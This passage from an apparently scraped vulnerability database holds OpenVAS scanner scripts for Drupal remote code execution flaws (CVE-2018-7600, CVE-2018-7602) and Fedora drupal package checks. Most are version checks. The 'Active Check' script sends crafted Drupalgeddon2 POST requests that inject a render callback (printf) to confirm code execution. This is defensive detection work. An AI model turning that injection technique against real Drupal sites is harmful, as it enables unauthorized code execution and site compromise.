exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!drupalPort = get_app_port(cpe:CPE)) {\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:drupalPort, version_regex:\"^([0-9]+)\", exit_no_version:TRUE)) {\n exit(0);\n}\n\ndrupalVer = infos['version'];\npath = infos['location'];\n\nif(drupalVer =~ \"^(6\\.)\") {\n fix = \"Drupal 6 is End of Life.please contact a D6LTS vendor\";\n}\n\nif(drupalVer =~ \"^(8\\.2)\" || drupalVer == \"8.5.0\"){\n fix = \"8.5.1\";\n}\n\nif(drupalVer =~ \"^(8\\.)\" && version_in_range(version:drupalVer, test_version:\"8.3.0\", test_version2:\"8.3.8\")) {\n fix = \"8.3.9\";\n}\n\nif(drupalVer =~ \"^(8\\.)\" && version_in_range(version:drupalVer, test_version:\"8.4.0\", test_version2:\"8.4.5\")) {\n fix = \"8.4.6\";\n}\n\nif(drupalVer =~ \"^(7\\.)\" && version_in_range(version:drupalVer, test_version:\"7.0\", test_version2:\"7.57\")) {\n fix = \"7.58\";\n}\n\nif(fix) {\n report = report_fixed_ver(installed_version:drupalVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:drupalPort);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:34", "bulletinFamily": "scanner", "description": "This host is running Drupal and is prone\n to critical remote code execution vulnerability.", "modified": "2018-10-22T00:00:00", "published": "2018-03-29T00:00:00", "id": "OPENVAS:1361412562310812584", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812584", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Linux, Version Check)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-002_lin.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Linux, Version Check)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812584\");\n script_version(\"$Revision: 12012 $\");\n script_cve_id(\"CVE-2018-7600\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 10:53:12 +0530 (Thu, 29 Mar 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Linux, Version Check)\");\n\n script_tag(name:\"summary\", value:\"This host is running Drupal and is prone\n to critical remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within multiple subsystems\n of Drupal. This potentially allows attackers to exploit multiple attack\n vectors on a Drupal site, which could result in the site being completely\n compromised.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and completely compromise the site.\");\n\n script_tag(name:\"affected\", value:\"Drupal core versions 6.x and earlier,\n\n Drupal core versions 8.2.x and earlier,\n\n Drupal core versions 8.3.x to before 8.3.9,\n\n Drupal core versions 8.4.x to before 8.4.6,\n\n Drupal core versions 8.5.x to before 8.5.1 and\n\n Drupal core versions 7.x to before 7.58 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Drupal core version 8.3.9 or\n 8.4.6 or 8.5.1 or 7.58 or later. Please see the referenced links for available updates.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/psa-2018-001\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_xref(name:\"URL\", value:\"https://research.checkpoint.com/uncovering-drupalgeddon-2/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_unixoide\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!drupalPort = get_app_port(cpe:CPE)) {\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:drupalPort, version_regex:\"^([0-9.]+)\", exit_no_version:TRUE)) {\n exit(0);\n}\n\ndrupalVer = infos['version'];\npath = infos['location'];\n\nif(drupalVer =~ \"^(6\\.)\") {\n fix = \"Drupal 6 is End of Life.please contact a D6LTS vendor\";\n}\n\nif(drupalVer =~ \"^(8\\.2)\" || drupalVer == \"8.5.0\") {\n fix = \"Upgrade to 8.5.1\";\n}\n\nif(version_in_range(version:drupalVer, test_version:\"8.3.0\", test_version2:\"8.3.8\")) {\n fix = \"Upgrade to 8.3.9\";\n}\n\nif(version_in_range(version:drupalVer, test_version:\"8.4.0\", test_version2:\"8.4.5\")) {\n fix = \"Upgrade to 8.4.6\";\n}\n\nif(version_in_range(version:drupalVer, test_version:\"7.0\", test_version2:\"7.57\")) {\n fix = \"Upgrade to 7.58\";\n}\n\nif(fix) {\n report = report_fixed_ver(installed_version:drupalVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:drupalPort);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:34", "bulletinFamily": "scanner", "description": "This host is running Drupal and is prone\n to critical remote code execution vulnerability.", "modified": "2019-03-07T00:00:00", "published": "2018-04-14T00:00:00", "id": "OPENVAS:1361412562310108438", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108438", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-002_active.nasl 14034 2019-03-07 11:12:35Z cfischer $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108438\");\n script_version(\"$Revision: 14034 $\");\n script_cve_id(\"CVE-2018-7600\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-07 12:12:35 +0100 (Thu, 07 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-14 13:29:22 +0200 (Sat, 14 Apr 2018)\");\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\");\n script_mandatory_keys(\"drupal/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/psa-2018-001\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_xref(name:\"URL\", value:\"https://research.checkpoint.com/uncovering-drupalgeddon-2/\");\n\n script_tag(name:\"summary\", value:\"This host is running Drupal and is prone\n to critical remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request and check the response.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within multiple subsystems\n of Drupal. This potentially allows attackers to exploit multiple attack\n vectors on a Drupal site, which could result in the site being completely\n compromised.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and completely compromise the site.\");\n\n script_tag(name:\"affected\", value:\"Drupal core versions 6.x and earlier,\n\n Drupal core versions 8.2.x and earlier,\n\n Drupal core versions 8.3.x to before 8.3.9,\n\n Drupal core versions 8.4.x to before 8.4.6,\n\n Drupal core versions 8.5.x to before 8.5.1 and\n\n Drupal core versions 7.x to before 7.58 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Drupal core version 8.3.9 or\n 8.4.6 or 8.5.1 or 7.58 later. Please see the refereced links for available updates.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" )\n dir = \"\";\n\ncheck = rand_str( length:16 );\n# nb: URL rewriting on/off\nurls = make_list( dir + \"/user/register\", dir + \"/?q=user/register\" );\n\nforeach url( urls ) {\n\n url = url + \"?element_parents=account%2Fmail%2F%23value&ajax_form=1&_wrapper_format=drupal_ajax\";\n data = \"form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]=\" + check;\n req = http_post_req( port:port, url:url, data:data,\n add_headers:make_array( \"Content-Type\", \"application/x-www-form-urlencoded\" ) );\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );\n # neNWIz2mlhti89hQ[{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"16\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\n if( egrep( string:res, pattern:\"^\" + check + \"\\[\\{\" ) ) {\n\n info['\"HTTP POST\" body'] = data;\n info['URL'] = report_vuln_url( port:port, url:url, url_only:TRUE );\n\n report = 'By doing the following request:\\n\\n';\n report += text_format_table( array:info ) + '\\n';\n report += 'it was possible to execute the \"printf\" command.';\n report += '\\n\\nResult:\\n\\n' + res;\n\n expert_info = 'Request:\\n'+ req + 'Response:\\n' + res + '\\n';\n security_message( port:port, data:report, expert_info:expert_info );\n exit( 0 );\n }\n}\n\n# Drupal 7\n# This needs 2 requests (see e.g. https://github.com/FireFart/CVE-2018-7600/blob/master/poc.py)\nurl1 = dir + \"/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=printf&name%5B%23markup%5D=\"+ check +\n \"&name%5B%23typ\";\ndata1 = \"form_id=user_pass&_triggering_element_name=name\";\n\nreq = http_post_req( port:port, url:url1, data:data1,\n add_headers:make_array( \"Content-Type\", \"application/x-www-form-urlencoded\" ) );\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );\n\nbuild_id = eregmatch(pattern: '<input type=\"hidden\" name=\"form_build_id\" value=\"([^\"]+)\" />', string: res);\nif (!isnull(build_id[1])) {\n url2 = dir + \"/?q=file%2Fajax%2Fname%2F%23value%2F\" + build_id[1];\n data2 = \"form_build_id=\" + build_id[1];\n req = http_post_req( port:port, url:url2, data:data2,\n add_headers:make_array( \"Content-Type\", \"application/x-www-form-urlencoded\" ) );\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );\n\n # wz8rLLg_3Uie91Rg[{\"command\":\"settings\",\"settings\":{\"basePath\":\"...\n if( egrep( string:res, pattern:\"^\" + check + \"\\[\\{\" ) ) {\n\n info['Req 1: \"HTTP POST\" body'] = data1;\n info['Req 1: URL'] = report_vuln_url( port:port, url:url1, url_only:TRUE );\n info['Req 2: \"HTTP POST\" body'] = data2;\n info['Req 2: URL'] = report_vuln_url( port:port, url:url2, url_only:TRUE );\n\n report = 'By doing the following subsequent requests:\\n\\n';\n report += text_format_table( array:info ) + '\\n';\n report += 'it was possible to execute the \"printf\" command to return the data \"' + check + '\".';\n report += '\\n\\nResult:\\n\\n' + res;\n\n expert_info = 'Request:\\n'+ req + 'Response:\\n' + res + '\\n';\n security_message( port:port, data:report, expert_info:expert_info );\n exit( 0 );\n }\n}\n\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:34", "bulletinFamily": "scanner", "description": "Drupal is prone to a remote code execution vulnerability.", "modified": "2018-10-22T00:00:00", "published": "2018-04-26T00:00:00", "id": "OPENVAS:1361412562310141029", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141029", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_win.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141029\");\n script_version(\"$Revision: 12012 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Drupal is prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists within multiple subsystems of\n Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\n could result in the site being compromised. This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name:\"affected\", value:\"Drupal 7.x and 8.x\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE)) {\n exit(0);\n}\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\", exit_no_version: TRUE)) {\n exit(0);\n}\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:34", "bulletinFamily": "scanner", "description": "Drupal is prone to a remote code execution vulnerability.", "modified": "2018-10-22T00:00:00", "published": "2018-04-26T00:00:00", "id": "OPENVAS:1361412562310141028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141028", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_lin.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141028\");\n script_version(\"$Revision: 12012 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Drupal is prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists within multiple subsystems of\n Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\n could result in the site being compromised. This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name:\"affected\", value:\"Drupal 7.x and 8.x\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE)) {\n exit(0);\n}\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\", exit_no_version: TRUE)) {\n exit(0);\n}\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:56", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-05-12T00:00:00", "id": "OPENVAS:1361412562310874421", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874421", "title": "Fedora Update for drupal7 FEDORA-2018-b9ad458866", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_b9ad458866_drupal7_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-b9ad458866\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874421\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 05:59:21 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-7600\", \"CVE-2017-6927\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-b9ad458866\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-b9ad458866\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GYT7R43FLLEEG4N2QS3FDGZ3NNHOL3HL\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.59~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:06", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-05-16T00:00:00", "id": "OPENVAS:1361412562310874456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874456", "title": "Fedora Update for drupal8 FEDORA-2018-8fd924a53d", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_8fd924a53d_drupal8_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-8fd924a53d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874456\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-16 05:53:29 +0200 (Wed, 16 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-8fd924a53d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-8fd924a53d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OKWJWSEKSJJSQ7G5K3DVNXGLB44LQX64\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n 